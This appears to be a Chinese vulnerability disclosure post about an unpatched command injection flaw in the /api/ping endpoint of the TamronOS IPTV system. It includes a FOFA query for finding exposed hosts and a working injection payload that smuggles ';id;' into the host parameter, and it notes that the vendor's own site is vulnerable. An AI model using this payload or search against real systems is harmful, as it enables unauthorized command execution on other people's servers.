TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案,系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。 同时系统支持多种节目源接入(卫星源、广电源、运营商IPTV源、网络源、自办频道、编码器等其他第三方设备提供的源)。基于Apple公司的HLS直播传输技术,以及我公司自主研发的动态内存切片技术,在使用 流媒体输出的同时保证了最大用户待机量(一个千兆口1500用户、一个万兆口6-8K用户),同时也是国内唯一能实现单台服务器负载140-200路直播的IPTV系统。
TamronOS采用自主研发的视频解析下载系统,配合云数据,能够自动完成对影片的采集、下载、合并、入库,所有影视剧与十大视频网站几乎同步更新。同时拥有最人性话UI设计和更为直观的后台管系统,未接触过 类似系统的用户,可以通过阅读本教程快速熟练的搭建IPTV系统。
漏洞描述
TamronOS IPTV
系统?
api/ping?
存在任意命令执行漏洞,攻击者通过漏洞可以执行任意命令。
漏洞复现
FOFA搜索
app="TamronOS-IPTV系统"
漏洞POC如下
/api/ping?count=5&host=;id;
?
厂商尚未提供漏洞修复方案,请关注厂商主页更新:
TamronOS--全国领先的IPTV系统提供商
总结
这个系统的提供商官网也还存在这个漏洞